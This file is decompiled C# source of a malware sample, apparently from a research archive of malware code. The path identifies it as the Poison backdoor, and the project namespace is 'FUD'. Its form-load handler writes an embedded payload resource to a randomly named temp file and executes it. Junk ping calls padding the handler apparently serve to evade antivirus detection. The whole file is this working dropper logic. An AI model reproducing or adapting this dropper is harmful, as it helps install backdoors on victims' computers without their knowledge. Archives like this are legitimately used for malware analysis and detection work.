MalwareSourceCode/MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.aec-4886f6c9f45d8971ab31a20a21e3b704c1278d1a1eac172c181a0c1f50c44e49/Form1.cs
2022-08-18 06:28:56 -05:00

106 lines
2.8 KiB
C#

// Decompiled with JetBrains decompiler
// Type: FUD.Form1
// Assembly: FUD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B2724D87-94C0-4D6D-A3C1-4EC18A6956AE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.aec-4886f6c9f45d8971ab31a20a21e3b704c1278d1a1eac172c181a0c1f50c44e49.exe
using FUD.My;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
namespace FUD
{
[DesignerGenerated]
public class Form1 : Form
{
private IContainer components;
[DebuggerNonUserCode]
public Form1()
{
this.Load += new EventHandler(this.Form1_Load);
this.InitializeComponent();
}
[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
if (!disposing || this.components == null)
return;
this.components.Dispose();
}
finally
{
base.Dispose(disposing);
}
}
[DebuggerStepThrough]
private void InitializeComponent()
{
this.SuspendLayout();
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(292, 266);
this.Name = nameof (Form1);
this.Text = nameof (Form1);
this.ResumeLayout(false);
}
private void Form1_Load(object sender, EventArgs e)
{
try
{
MyProject.Computer.Network.Ping(MyProject.Computer.Name);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
MyProject.Computer.Name.Substring(0, 1);
ProjectData.ClearProjectError();
}
string randomFileName = Path.GetRandomFileName();
try
{
MyProject.Computer.Network.Ping(MyProject.Computer.Name);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
MyProject.Computer.Name.Substring(0, 1);
ProjectData.ClearProjectError();
}
File.WriteAllBytes(Path.GetTempPath() + "\\" + randomFileName, FUD.My.Resources.Resources.nevv);
try
{
MyProject.Computer.Network.Ping(MyProject.Computer.Name);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
MyProject.Computer.Name.Substring(0, 1);
ProjectData.ClearProjectError();
}
Interaction.Shell(Path.GetTempPath() + "\\" + randomFileName);
try
{
MyProject.Computer.Network.Ping(MyProject.Computer.Name);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
MyProject.Computer.Name.Substring(0, 1);
ProjectData.ClearProjectError();
}
}
}
}